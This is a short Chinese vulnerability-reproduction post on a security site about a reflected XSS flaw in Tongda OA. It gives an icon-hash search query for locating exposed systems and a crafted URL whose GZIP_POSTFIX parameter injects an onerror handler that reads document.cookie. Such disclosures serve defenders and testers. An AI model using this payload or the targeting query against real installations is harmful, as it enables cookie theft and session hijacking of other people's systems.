【漏洞复现】通达OA存在反射XSS

admin 2024年2月28日15:19:29评论50 views字数 299阅读0分59秒阅读模式

漏洞介绍

通达OA是中国协同办公自动化软件(OA软件)普及型的旗舰产品。该系统存在xss跨站脚本漏洞,可能造成cookie泄漏,黑客可利用获得的cookie登录系统。

资产收集

web.icon=="1205af91d6b1638c23de1132ae0c7e0b"

【漏洞复现】通达OA存在反射XSS

漏洞复现

【漏洞复现】通达OA存在反射XSS

构造url

http://ip/module/html_editor/editor/plugins/td_listview/td_listview.php?GZIP_POSTFIX=%22+onerror=alert(document.cookie)+a=1

【漏洞复现】通达OA存在反射XSS

【漏洞复现】通达OA存在反射XSS

原文始发于微信公众号(Devil安全):【漏洞复现】通达OA存在反射XSS

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月28日15:19:29
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】通达OA存在反射XSShttps://cn-sec.com/archives/2533721.html

发表评论

匿名网友 填写信息